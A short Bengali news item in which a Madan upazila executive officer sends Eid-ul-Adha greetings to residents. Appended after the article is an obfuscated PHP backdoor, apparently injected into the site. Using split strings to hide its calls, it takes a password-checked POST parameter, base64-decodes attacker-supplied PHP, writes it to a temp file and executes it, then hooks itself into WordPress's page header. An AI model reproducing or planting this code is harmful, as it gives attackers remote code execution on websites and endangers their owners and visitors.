|

পবিত্র ঈদ-উল আযহা উপলক্ষে মদন ইউএনও শাহ আলম মিয়ার শুভেচ্ছা

প্রকাশিতঃ 12:19 am | June 16, 2024

পবিত্র ঈদ-উল আযহা উপলক্ষে মদন ইউএনও শাহ আলম মিয়ার শুভেচ্ছা

শহীদুল ইসলাম নেত্রকোনা প্রতিনিধিঃ ঈদ মানে খুশি ঈদ মানে আনন্দ। পবিত্র ঈদ-উল আযহা উপলক্ষে মদন উপজেলাবাসী ও ধর্মপ্রাণ মুসলমান ভাই বোনদের শুভেচ্ছা জানিয়েছেন মদন উপজেলা নির্বাহী কর্মকর্তা মোঃ শাহ আলম মিয়া।

তিনি শুভেচ্ছা বার্তায় বলেন, সকল মুসলিম উম্মার জন্য অপেক্ষা করছে বছরের শ্রেষ্ঠতম আনন্দের দিন পবিত্র ঈদু-উল আযহা। আমি মদন উপজেলার সকল ধর্মপ্রাণ মুসলমান ভাই বোনদের ঈদ- উল আযহার শুভেচ্ছা জানাই। একসাথে মাননীয় প্রধানমন্ত্রী শেখ হাসিনার সুস্বাস্থ্য ও দীর্ঘায়ু কামনা করি।

তিনি আরো বলেন,ঈদ-উল আযহা মুসলিম জাহানের অন্যতম প্রধান ধর্মীয় উৎসব। কোরবানীর খুশি আর আনন্দের বার্তা নিয়ে আমাদের মাঝে সমাগত হয় পবিত্র ঈদু-উল আযহা। ঈদ সব শ্রেণীর পেশার মানুষের মধ্যে গড়ে তোলে সোহার্দ্য, সম্প্রীতি ও ঐক্যের বন্ধন। সেই সাথে দেশবাসী সুখ শান্তি,সমৃদ্ধি,সুস্বাস্থ্য ও নিরাপদ জীবন এবং বিশ্বের মুসলিম উম্মার শান্তি সমৃদ্ধি ও সফলতা কামনা করেন।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}